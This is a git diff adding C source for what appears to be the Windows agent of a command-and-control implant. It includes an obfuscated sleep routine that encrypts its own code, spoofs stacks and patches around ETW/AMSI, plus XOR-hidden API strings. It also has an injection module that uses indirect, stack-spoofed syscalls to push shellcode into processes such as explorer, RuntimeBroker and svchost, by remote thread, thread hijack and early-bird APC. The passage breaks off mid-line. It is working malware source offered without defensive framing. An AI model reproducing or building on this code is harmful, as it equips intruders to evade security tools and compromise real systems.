beacon_sleep_obf(DWORD ms) +{ +#if JITTER_PCT == 0 + /* Test mode: skip .text encrypt dance, just sleep */ + Sleep(ms); + return; +#endif + LPVOID text_base = NULL; + SIZE_T text_size = 0; + _find_section(".text", &text_base, &text_size); + if (!text_base || !text_size) { Sleep(ms); return; } + + char s[24] = {0}; + + _XDEC(EVS_dll_ntdll, s); + HMODULE hntdll = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + if (!hntdll) { Sleep(ms); return; } + + _XDEC(EVS_fn_NtContinue, s); + NtContinue_t fn_cont = (NtContinue_t)(void *)GetProcAddress(hntdll, s); + SecureZeroMemory(s, sizeof(s)); + + _XDEC(EVS_fn_NtWaitForSingleObject, s); + NtWait_t fn_wait = (NtWait_t)(void *)GetProcAddress(hntdll, s); + SecureZeroMemory(s, sizeof(s)); + + _XDEC(EVS_fn_RtlCaptureContext, s); + RtlCapCtx_t fn_cap = (RtlCapCtx_t)(void *)GetProcAddress(hntdll, s); + SecureZeroMemory(s, sizeof(s)); + + _XDEC(EVS_fn_RtlUserThreadStart, s); + PVOID fn_rts = (PVOID)GetProcAddress(hntdll, s); + SecureZeroMemory(s, sizeof(s)); + + if (!fn_cont || !fn_wait || !fn_cap) { Sleep(ms); return; } + + /* resolve kernel32 functions by direct VA, not IAT thunks */ + _XDEC(EVS_dll_kernel32, s); + HMODULE hk32 = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + if (!hk32) { Sleep(ms); return; } + + _XDEC(EVS_fn_VirtualProtect, s); + VProt_t fn_vprot = (VProt_t) GetProcAddress(hk32, s); + SecureZeroMemory(s, sizeof(s)); + + _XDEC(EVS_fn_Sleep, s); + Sleep_t fn_sleep = (Sleep_t) GetProcAddress(hk32, s); + SecureZeroMemory(s, sizeof(s)); + + _XDEC(EVS_fn_SetEvent, s); + SetEvent_t fn_setevent = (SetEvent_t)GetProcAddress(hk32, s); + SecureZeroMemory(s, sizeof(s)); + + if (!fn_vprot || !fn_sleep || !fn_setevent) { Sleep(ms); return; } + + obf_ctx_t *ctx = (obf_ctx_t *)HeapAlloc( + GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(obf_ctx_t)); + if (!ctx) { Sleep(ms); return; } + + ctx->text_base = text_base; + ctx->text_size = text_size; + ctx->sleep_ms = ms; + ctx->ntcontinue = fn_cont; + ctx->fn_vprot = fn_vprot; + ctx->fn_sleep = fn_sleep; + ctx->fn_setevent = fn_setevent; + ctx->done = CreateEventA(NULL, FALSE, FALSE, NULL); + if (!ctx->done) { HeapFree(GetProcessHeap(), 0, ctx); Sleep(ms); return; } + + /* relative timeout in 100ns units, with 5s buffer */ + ctx->timeout.QuadPart = -((LONGLONG)(ms + 5000) * 10000LL); + + BCryptGenRandom(NULL, ctx->key, sizeof(ctx->key), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + + /* allocate fake stack so RSP stays within TEB [StackLimit, StackBase] */ + ctx->fake_stack_mem = VirtualAlloc(NULL, FAKE_STACK_SZ, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!ctx->fake_stack_mem) { + CloseHandle(ctx->done); + HeapFree(GetProcessHeap(), 0, ctx); + InterlockedExchange(&s_restore, 0); + Sleep(ms); + return; + } + /* set trampoline as return address for NtWait */ + PVOID *fake_top = (PVOID *)((BYTE *)ctx->fake_stack_mem + FAKE_STACK_SZ - 16); + fake_top[0] = (PVOID)_sleep_trampoline; /* ret addr for NtWait */ + fake_top[1] = fn_rts ? (PVOID)((BYTE *)fn_rts + 0x10) : NULL; /* fake upper frame */ + + /* save TEB stack limits for restoration on wakeup */ + ctx->orig_stack_base = _teb_read_ptr(0x08); + ctx->orig_stack_limit = _teb_read_ptr(0x10); + + s_obf_ctx = ctx; + InterlockedExchange(&s_restore, 0); + + /* save current context (RIP = instruction after this call) */ + fn_cap(&s_saved_ctx); + + /* two-pass: first call sleeps, second call (restored by trampoline) cleans up */ + if (InterlockedCompareExchange(&s_restore, 0, 1) == 1) { + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + return; + } + InterlockedExchange(&s_restore, 1); + + /* build fake context: RSP=fake_stack, RIP=NtWait */ + CONTEXT fake_ctx; + memcpy(&fake_ctx, &s_saved_ctx, sizeof(CONTEXT)); + fake_ctx.Rsp = (DWORD64)(uintptr_t)fake_top; + fake_ctx.Rip = (DWORD64)(uintptr_t)fn_wait; + fake_ctx.Rcx = (DWORD64)ctx->done; /* arg1: handle */ + fake_ctx.Rdx = FALSE; /* arg2: alertable */ + fake_ctx.R8 = (DWORD64)(uintptr_t)&ctx->timeout; /* arg3: timeout */ + + /* create timer thread before encrypting .text (DLL_THREAD_ATTACH needs .text) */ + HANDLE ht = CreateThread(NULL, 0, _timer_thread, ctx, 0, NULL); + if (!ht) { + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + InterlockedExchange(&s_restore, 0); + Sleep(ms); + return; + } + /* arm ETW/AMSI breakpoints on timer thread before it runs */ + evasion_apply_thread(ht); + CloseHandle(ht); + + /* verify page permission round-trip before committing to obfuscated sleep */ + BYTE *p = (BYTE *)text_base; + DWORD old, dummy; + + /* verify RW/XR round-trip; fall back to plain sleep if ACG blocks it */ + if (!_nt_prot(p, text_size, PAGE_READWRITE, &old)) { + goto _fallback; + } + if (!_nt_prot(p, text_size, old, &dummy)) { + _nt_prot(p, text_size, old, &dummy); + goto _fallback; + } + /* re-apply RW for _obf_sleep_tail */ + _nt_prot(p, text_size, PAGE_READWRITE, &old); + + /* jump to .noscan tail, never returns */ + _obf_sleep_tail(ctx, &fake_ctx); + __builtin_unreachable(); + +_fallback: + SecureZeroMemory(ctx->key, sizeof(ctx->key)); + CloseHandle(ctx->done); + VirtualFree(ctx->fake_stack_mem, 0, MEM_RELEASE); + HeapFree(GetProcessHeap(), 0, ctx); + InterlockedExchange(&s_restore, 0); + Sleep(ms); +} diff --git a/agent/src/evs.c b/agent/src/evs.c new file mode 100644 index 0000000..a17f2f4 --- /dev/null +++ b/agent/src/evs.c @@ -0,0 +1,12 @@ +#include "evs_strings.h" +#include + +/* Single XOR-decode function. noinline = one code pattern in .text, not 100+ loops. */ +__attribute__((noinline)) +void _evs_dec(char *out, const unsigned char *enc, size_t n) +{ + unsigned char k = EVS_KEY; + for (size_t i = 0; i < n; i++) + out[i] = (char)(enc[i] ^ k); + out[n] = '\0'; +} diff --git a/agent/src/inject/inject.c b/agent/src/inject/inject.c new file mode 100644 index 0000000..937d23b --- /dev/null +++ b/agent/src/inject/inject.c @@ -0,0 +1,1046 @@ +#include "inject.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include +#include +#include +#include +#include + +typedef LONG NTSTATUS; + +static DWORD _rt(HANDLE h) +{ + static DWORD(WINAPI * fn)(HANDLE) = NULL; + if (!fn) + { + char fs[16], ks[16]; + EVS_D(fs, EVS_fn_ResumeThread); + EVS_D(ks, EVS_dll_kernel32); + HMODULE m = _peb_module(ks); + SecureZeroMemory(ks, sizeof(ks)); + if (m) + fn = (DWORD(WINAPI *)(HANDLE))GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(h) : (DWORD)-1; +} + +/* ---- Spoof-call globals (accessed by name from spoof_stub.S) ---- */ +void *inj_sc_gadget = NULL; /* syscall;ret in ntdll .text */ +void *inj_frame1 = NULL; /* kernelbase `ret` gadget */ +void *inj_frame2 = NULL; /* ntdll `ret` gadget */ + +/* Defined in spoof_stub.S — call-stack-spoofed indirect syscall dispatcher. + * SSN + up to 11 args; unused trailing args must be 0. + * All frames in .text (MEM_IMAGE) — no VirtualAlloc stub. */ +extern NTSTATUS inj_sc(WORD ssn, + uintptr_t a1, uintptr_t a2, uintptr_t a3, uintptr_t a4, + uintptr_t a5, uintptr_t a6, uintptr_t a7, uintptr_t a8, + uintptr_t a9, uintptr_t a10, uintptr_t a11); + +/* Nt* struct definitions (no winternl.h to avoid SDK conflicts) */ +typedef struct +{ + ULONG Length; + HANDLE RootDirectory; + PVOID ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; + PVOID SecurityQualityOfService; +} INJ_OA; + +typedef struct +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; +} INJ_CID; + +/* void* for struct pointer args — ABI-safe on x64 */ +typedef NTSTATUS(NTAPI *NtOpenProcess_t)( + PHANDLE hProcess, + ACCESS_MASK access, + void *oa, + void *cid); + +typedef NTSTATUS(NTAPI *NtAllocVm_t)( + HANDLE hProcess, + PVOID *base, + ULONG_PTR zeroBits, + PSIZE_T regionSize, + ULONG allocType, + ULONG protect); + +typedef NTSTATUS(NTAPI *NtWriteVm_t)( + HANDLE hProcess, + PVOID base, + PVOID buf, + SIZE_T len, + PSIZE_T written); + +typedef NTSTATUS(NTAPI *NtProtectVm_t)( + HANDLE hProcess, + PVOID *base, + PSIZE_T regionSize, + ULONG newProtect, + PULONG oldProtect); + +typedef NTSTATUS(NTAPI *NtCreateThreadEx_t)( + PHANDLE hThread, + ACCESS_MASK access, + void *oa, + HANDLE hProcess, + PVOID startRoutine, + PVOID arg, + ULONG flags, + SIZE_T zeroBits, + SIZE_T stackSize, + SIZE_T maxStack, + PVOID attrList); + +typedef NTSTATUS(NTAPI *NtClose_t)(HANDLE h); + +typedef NTSTATUS(NTAPI *NtQueueApcThread_t)( + HANDLE hThread, + PVOID ApcRoutine, + PVOID ApcRoutineContext, + PVOID ApcStatusBlock, + PVOID ApcReserved); + +/* module-stomp syscall types */ + +typedef NTSTATUS(NTAPI *NtCreateSection_t)( + PHANDLE SectionHandle, + ACCESS_MASK DesiredAccess, + void *ObjectAttributes, + PLARGE_INTEGER MaximumSize, + ULONG SectionPageProtect, + ULONG AllocationAttributes, + HANDLE FileHandle); + +typedef NTSTATUS(NTAPI *NtMapViewOfSection_t)( + HANDLE SectionHandle, + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG_PTR ZeroBits, + SIZE_T CommitSize, + PLARGE_INTEGER SectionOffset, + PSIZE_T ViewSize, + DWORD InheritDisposition, + ULONG AllocationType, + ULONG Win32Protect); + +typedef NTSTATUS(NTAPI *NtUnmapViewOfSection_t)( + HANDLE ProcessHandle, + PVOID BaseAddress); + +/* thread-hijack syscall types */ + +typedef NTSTATUS(NTAPI *NtOpenThread_t)( + PHANDLE hThread, + ACCESS_MASK access, + void *oa, + void *cid); + +typedef NTSTATUS(NTAPI *NtSuspendThread_t)( + HANDLE hThread, + PULONG PrevSuspendCount); + +typedef NTSTATUS(NTAPI *NtResumeThread_t)( + HANDLE hThread, + PULONG PrevSuspendCount); + +typedef NTSTATUS(NTAPI *NtGetCtx_t)( + HANDLE hThread, + PCONTEXT ctx); + +typedef NTSTATUS(NTAPI *NtSetCtx_t)( + HANDLE hThread, + PCONTEXT ctx); + +/* ---- ntdll handle (XOR-decoded, resolved once) ---- */ + +static HMODULE _ntdll(void) +{ + static HMODULE s_h = NULL; + if (s_h) + return s_h; + char s[10] = {0}; + EVS_D(s, EVS_dll_ntdll); + s_h = _peb_module(s); + SecureZeroMemory(s, sizeof(s)); + return s_h; +} + +/* ---- Indirect syscall gadget (syscall;ret inside ntdll .text) ---- */ + +static void *_syscall_gadget(void) +{ + static void *s_g = NULL; + if (s_g) + return s_g; + + HMODULE h = _ntdll(); + if (!h) + return NULL; + + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)h; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)h + dos->e_lfanew); + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) + { + if (memcmp(sec->Name, ".text", 5) != 0) + continue; + BYTE *base = (BYTE *)h + sec->VirtualAddress; + SIZE_T sz = sec->Misc.VirtualSize; + for (SIZE_T j = 0; j + 2 < sz; j++) + { + /* syscall;ret opcode sequence */ + if (base[j] == 0x0F && base[j + 1] == 0x05 && base[j + 2] == 0xC3) + { + s_g = base + j; + return s_g; + } + } + } + return NULL; +} + +/* resolve syscall number (SSN) from ntdll EAT, with Halo's Gate fallback */ +static WORD _ssn(const char *name) +{ + HMODULE ntdll = _ntdll(); + if (!ntdll) + return 0xFFFF; + + BYTE *fn = (BYTE *)(void *)GetProcAddress(ntdll, name); + if (!fn) + return 0xFFFF; + + if (fn[0] == 0x4C && fn[1] == 0x8B && fn[2] == 0xD1 && fn[3] == 0xB8) + return *(WORD *)(fn + 4); + + /* hooked: scan EAT for unhooked neighbor and adjust SSN by delta */ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)ntdll; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)ntdll + dos->e_lfanew); + IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)((BYTE *)ntdll + nt->OptionalHeader.DataDirectory[0].VirtualAddress); + + DWORD *names = (DWORD *)((BYTE *)ntdll + exp->AddressOfNames); + DWORD *funcs = (DWORD *)((BYTE *)ntdll + exp->AddressOfFunctions); + WORD *ords = (WORD *)((BYTE *)ntdll + exp->AddressOfNameOrdinals); + + int idx = -1; + for (DWORD i = 0; i < exp->NumberOfNames; i++) + { + if (strcmp((char *)((BYTE *)ntdll + names[i]), name) == 0) + { + idx = (int)i; + break; + } + } + if (idx < 0) + return 0xFFFF; + + for (int d = 1; d <= 32; d++) + { + for (int s = -1; s <= 1; s += 2) + { + int ni = idx + s * d; + if (ni < 0 || ni >= (int)exp->NumberOfNames) + continue; + BYTE *nb = (BYTE *)ntdll + funcs[ords[ni]]; + if (nb[0] == 0x4C && nb[1] == 0x8B && nb[2] == 0xD1 && nb[3] == 0xB8) + return (WORD)(*(WORD *)(nb + 4) - (WORD)(s * d)); + } + } + return 0xFFFF; +} + +/* Find first `ret` (0xC3) in module .text at or past min_off bytes into section */ +static void *_find_ret_gadget(HMODULE h, SIZE_T min_off) +{ + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)h; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)h + dos->e_lfanew); + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) + { + if (memcmp(sec->Name, ".text", 5) != 0) + continue; + BYTE *base = (BYTE *)h + sec->VirtualAddress; + SIZE_T sz = sec->Misc.VirtualSize; + for (SIZE_T j = min_off; j < sz; j++) + if (base[j] == 0xC3) + return base + j; + } + return NULL; +} + +static BOOL _init_spoof_frames(void) +{ + inj_sc_gadget = _syscall_gadget(); + if (!inj_sc_gadget) + return FALSE; + + char kbn[16] = {0}; + EVS_D(kbn, EVS_dll_kernelbase); + HMODULE hkb = _peb_module(kbn); + SecureZeroMemory(kbn, sizeof(kbn)); + + if (hkb) + inj_frame1 = _find_ret_gadget(hkb, 0x2000); + inj_frame2 = _find_ret_gadget(_ntdll(), 0x3000); + return inj_frame1 && inj_frame2; +} + +/* ---- Resolved syscall numbers — SSN_ prefix avoids SC_* Windows macro conflicts ---- */ +enum +{ + SSN_OPEN = 0, + SSN_ALLOC, + SSN_WRITE, + SSN_PROT, + SSN_THREAD, + SSN_CLOSE, + SSN_OPENTHRD, + SSN_SUSPEND, + SSN_RESUME, + SSN_GETCTX, + SSN_SETCTX, + SSN_APC, + SSN_CRTSEC, + SSN_MAPSEC, + SSN_UNMAPSEC, + SSN_COUNT +}; +static WORD s_ssn[SSN_COUNT]; +static BOOL s_ready = FALSE; +static BOOL s_hj_ready = FALSE; +static BOOL s_eb_ready = FALSE; +static BOOL s_stomp_ready = FALSE; + +static BOOL _init(void) +{ + if (s_ready) + return TRUE; + if (!inj_sc_gadget && !_init_spoof_frames()) + return FALSE; + + struct + { + const unsigned char *e; + size_t n; + int idx; + } t[] = { + {EVS_fn_NtOpenProcess, sizeof(EVS_fn_NtOpenProcess), SSN_OPEN}, + {EVS_fn_NtAllocateVirtualMemory, sizeof(EVS_fn_NtAllocateVirtualMemory), SSN_ALLOC}, + {EVS_fn_NtWriteVirtualMemory, sizeof(EVS_fn_NtWriteVirtualMemory), SSN_WRITE}, + {EVS_fn_NtProtectVirtualMemory, sizeof(EVS_fn_NtProtectVirtualMemory), SSN_PROT}, + {EVS_fn_NtCreateThreadEx, sizeof(EVS_fn_NtCreateThreadEx), SSN_THREAD}, + {EVS_fn_NtClose, sizeof(EVS_fn_NtClose), SSN_CLOSE}, + }; + + char _n[32]; + for (int i = 0; i < 6; i++) + { + _evs_dec(_n, t[i].e, t[i].n); + s_ssn[t[i].idx] = _ssn(_n); + SecureZeroMemory(_n, t[i].n + 1); + if (s_ssn[t[i].idx] == 0xFFFF) + return FALSE; + } + s_ready = TRUE; + return TRUE; +} + +static BOOL _init_hijack(void) +{ + if (s_hj_ready) + return TRUE; + if (!inj_sc_gadget && !_init_spoof_frames()) + return FALSE; + + struct + { + const unsigned char *e; + size_t n; + int idx; + } t[] = { + {EVS_fn_NtOpenThread, sizeof(EVS_fn_NtOpenThread), SSN_OPENTHRD}, + {EVS_fn_NtSuspendThread, sizeof(EVS_fn_NtSuspendThread), SSN_SUSPEND}, + {EVS_fn_NtResumeThread, sizeof(EVS_fn_NtResumeThread), SSN_RESUME}, + {EVS_fn_NtGetContextThread, sizeof(EVS_fn_NtGetContextThread), SSN_GETCTX}, + {EVS_fn_NtSetContextThread, sizeof(EVS_fn_NtSetContextThread), SSN_SETCTX}, + }; + + char _n[24]; + for (int i = 0; i < 5; i++) + { + _evs_dec(_n, t[i].e, t[i].n); + s_ssn[t[i].idx] = _ssn(_n); + SecureZeroMemory(_n, t[i].n + 1); + if (s_ssn[t[i].idx] == 0xFFFF) + return FALSE; + } + s_hj_ready = TRUE; + return TRUE; +} + +static BOOL _init_earlybird(void) +{ + if (s_eb_ready) + return TRUE; + if (!inj_sc_gadget && !_init_spoof_frames()) + return FALSE; + char _n[18]; + EVS_D(_n, EVS_fn_NtQueueApcThread); + s_ssn[SSN_APC] = _ssn(_n); + SecureZeroMemory(_n, sizeof(_n)); + if (s_ssn[SSN_APC] == 0xFFFF) + return FALSE; + s_eb_ready = TRUE; + return TRUE; +} + +static BOOL _init_stomp(void) +{ + if (s_stomp_ready) + return TRUE; + if (!_init()) + return FALSE; + + + struct + { + const unsigned char *e; + size_t n; + int idx; + } t[] = { + {EVS_fn_NtCreateSection, sizeof(EVS_fn_NtCreateSection), SSN_CRTSEC}, + {EVS_fn_NtMapViewOfSection, sizeof(EVS_fn_NtMapViewOfSection), SSN_MAPSEC}, + {EVS_fn_NtUnmapViewOfSection, sizeof(EVS_fn_NtUnmapViewOfSection), SSN_UNMAPSEC}, + }; + + char _n[24]; + for (int i = 0; i < 3; i++) + { + _evs_dec(_n, t[i].e, t[i].n); + s_ssn[t[i].idx] = _ssn(_n); + SecureZeroMemory(_n, t[i].n + 1); + if (s_ssn[t[i].idx] == 0xFFFF) + return FALSE; + } + s_stomp_ready = TRUE; + return TRUE; +} + +/* open a process handle via indirect NtOpenProcess — no Win32 OpenProcess in IAT */ +HANDLE inject_nt_open_process(DWORD pid, DWORD access) +{ + if (!_init()) + return NULL; + + HANDLE hproc = NULL; + INJ_OA oa = {sizeof(oa), NULL, NULL, 0, NULL, NULL}; + INJ_CID cid = {(HANDLE)(uintptr_t)pid, NULL}; + NTSTATUS st = inj_sc(s_ssn[SSN_OPEN], + (uintptr_t)&hproc, (uintptr_t)access, (uintptr_t)&oa, (uintptr_t)&cid, + 0, 0, 0, 0, 0, 0, 0); + return st ? NULL : hproc; +} + +/* find explorer.exe PID for PPID spoof */ +static DWORD _find_explorer(void) +{ + char _en[13]; + EVS_D(_en, EVS_str_explorer_exe); + + DWORD pid = 0; + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) + { + SecureZeroMemory(_en, sizeof(_en)); + return 0; + } + PROCESSENTRY32 pe; + pe.dwSize = sizeof(pe); + if (Process32First(snap, &pe)) + do + { + if (_stricmp(pe.szExeFile, _en) == 0) + { + pid = pe.th32ProcessID; + break; + } + } while (Process32Next(snap, &pe)); + CloseHandle(snap); + SecureZeroMemory(_en, sizeof(_en)); + return pid; +} + +/* find a suitable injection target process */ + +DWORD inject_find_target(void) +{ + char n0[20], n1[14], n2[14]; + EVS_D(n0, EVS_str_RuntimeBroker_exe); + EVS_D(n1, EVS_str_dllhost_exe); + EVS_D(n2, EVS_str_explorer_exe); + + const char *prefs[4] = {n0, n1, n2, NULL}; + DWORD results[3] = {0}; + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snap == INVALID_HANDLE_VALUE) + goto cleanup; + + PROCESSENTRY32 pe; + pe.dwSize = sizeof(pe); + if (Process32First(snap, &pe)) + { + do + { + for (int i = 0; prefs[i]; i++) + if (!results[i] && _stricmp(pe.szExeFile, prefs[i]) == 0) + results[i] = pe.th32ProcessID; + } while (Process32Next(snap, &pe)); + } + CloseHandle(snap); + +cleanup: + SecureZeroMemory(n0, sizeof(n0)); + SecureZeroMemory(n1, sizeof(n1)); + SecureZeroMemory(n2, sizeof(n2)); + for (int i = 0; i < 3; i++) + if (results[i]) + return results[i]; + return 0; +} + +/* inject shellcode into remote process via indirect Nt* syscalls */ +int inject_remote(DWORD pid, const BYTE *sc, SIZE_T sc_len) +{ + if (!sc || !sc_len || !_init()) + return -1; + + HANDLE hproc = NULL; + PVOID base = NULL; + SIZE_T sz = sc_len; + + INJ_OA oa = {sizeof(oa), NULL, NULL, 0, NULL, NULL}; + INJ_CID cid = {(HANDLE)(uintptr_t)pid, NULL}; + + NTSTATUS st = inj_sc(s_ssn[SSN_OPEN], + (uintptr_t)&hproc, PROCESS_ALL_ACCESS, (uintptr_t)&oa, (uintptr_t)&cid, + 0, 0, 0, 0, 0, 0, 0); + if (st) + return -2; + + /* alloc RW, never RWX */ + st = inj_sc(s_ssn[SSN_ALLOC], + (uintptr_t)hproc, (uintptr_t)&base, 0, (uintptr_t)&sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -3; + } + + SIZE_T nwritten = 0; + st = inj_sc(s_ssn[SSN_WRITE], + (uintptr_t)hproc, (uintptr_t)base, (uintptr_t)sc, (uintptr_t)sc_len, + (uintptr_t)&nwritten, 0, 0, 0, 0, 0, 0); + if (st || nwritten != sc_len) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -4; + } + + /* flip RW -> RX, no RWX window */ + ULONG old_prot; + sz = sc_len; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)hproc, (uintptr_t)&base, (uintptr_t)&sz, + PAGE_EXECUTE_READ, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -5; + } + + HANDLE hthread = NULL; + st = inj_sc(s_ssn[SSN_THREAD], + (uintptr_t)&hthread, THREAD_ALL_ACCESS, 0, (uintptr_t)hproc, + (uintptr_t)base, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -6; + } + + CloseHandle(hthread); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return 0; +} + +/* hijack an existing thread in target process instead of creating a new one */ +int inject_thread_hijack(DWORD pid, const BYTE *sc, SIZE_T sc_len) +{ + if (!sc || !sc_len) + return -1; + if (!_init() || !_init_hijack()) + return -1; + + /* open target for VM ops only, no thread-create rights */ + HANDLE hproc = NULL; + PVOID base = NULL; + SIZE_T sz = sc_len; + + INJ_OA oa = {sizeof(oa), NULL, NULL, 0, NULL, NULL}; + INJ_CID cid = {(HANDLE)(uintptr_t)pid, NULL}; + + NTSTATUS st = inj_sc(s_ssn[SSN_OPEN], + (uintptr_t)&hproc, + PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, + (uintptr_t)&oa, (uintptr_t)&cid, 0, 0, 0, 0, 0, 0, 0); + if (st) + return -2; + + /* alloc RW, write, flip RX */ + st = inj_sc(s_ssn[SSN_ALLOC], + (uintptr_t)hproc, (uintptr_t)&base, 0, (uintptr_t)&sz, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -3; + } + + SIZE_T nw = 0; + st = inj_sc(s_ssn[SSN_WRITE], + (uintptr_t)hproc, (uintptr_t)base, (uintptr_t)sc, (uintptr_t)sc_len, + (uintptr_t)&nw, 0, 0, 0, 0, 0, 0); + if (st || nw != sc_len) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -4; + } + + ULONG old_prot; + sz = sc_len; + st = inj_sc(s_ssn[SSN_PROT], + (uintptr_t)hproc, (uintptr_t)&base, (uintptr_t)&sz, + PAGE_EXECUTE_READ, (uintptr_t)&old_prot, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -5; + } + + /* Enumerate threads — collect up to 64 TIDs belonging to pid */ + DWORD tids[64]; + int ntids = 0; + + HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); + if (snap != INVALID_HANDLE_VALUE) + { + THREADENTRY32 te; + te.dwSize = sizeof(te); + if (Thread32First(snap, &te)) + { + do + { + if (te.th32OwnerProcessID == pid && ntids < 64) + tids[ntids++] = te.th32ThreadID; + } while (Thread32Next(snap, &te)); + } + CloseHandle(snap); + } + + if (!ntids) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -6; + } + + /* prefer secondary thread (index 1) over main thread (index 0) */ + DWORD target_tid = (ntids > 1) ? tids[1] : tids[0]; + + /* open thread via syscall */ + HANDLE hthread = NULL; + INJ_CID tcid = {(HANDLE)(uintptr_t)pid, (HANDLE)(uintptr_t)target_tid}; + st = inj_sc(s_ssn[SSN_OPENTHRD], + (uintptr_t)&hthread, + THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, + (uintptr_t)&oa, (uintptr_t)&tcid, 0, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -7; + } + + /* suspend, redirect RIP, resume */ + ULONG prev = 0; + st = inj_sc(s_ssn[SSN_SUSPEND], (uintptr_t)hthread, (uintptr_t)&prev, + 0, 0, 0, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hthread, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -8; + } + + CONTEXT ctx; + memset(&ctx, 0, sizeof(ctx)); + ctx.ContextFlags = CONTEXT_FULL; + st = inj_sc(s_ssn[SSN_GETCTX], (uintptr_t)hthread, (uintptr_t)&ctx, + 0, 0, 0, 0, 0, 0, 0, 0, 0); + if (st) + { + inj_sc(s_ssn[SSN_RESUME], (uintptr_t)hthread, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hthread, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return -9; + } + +#ifdef _WIN64 + ctx.Rip = (DWORD64)(uintptr_t)base; +#else + ctx.Eip = (DWORD)(uintptr_t)base; +#endif + + st = inj_sc(s_ssn[SSN_SETCTX], (uintptr_t)hthread, (uintptr_t)&ctx, + 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_RESUME], (uintptr_t)hthread, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hthread, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + inj_sc(s_ssn[SSN_CLOSE], (uintptr_t)hproc, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0); + return st ? -10 : 0; +} + +/* spawn suspended process, queue shellcode as APC, resume */ +int inject_earlybird(const BYTE *sc, SIZE_T sc_len) +{ + if (!sc || !sc_len) + return -1; + if (!_init() || !_init_earlybird()) + return -1; + + char svc_name[16] = {0}; + EVS_D(svc_name, EVS_str_svchost_exe); + + /* Build full path: C:\Windows\System32\svchost.exe */ + char sys32[MAX_PATH]; + if (!GetSystemDirectoryA(sys32, sizeof(sys32))) + return -2; + char target[512]; /* 512 > MAX_PATH + 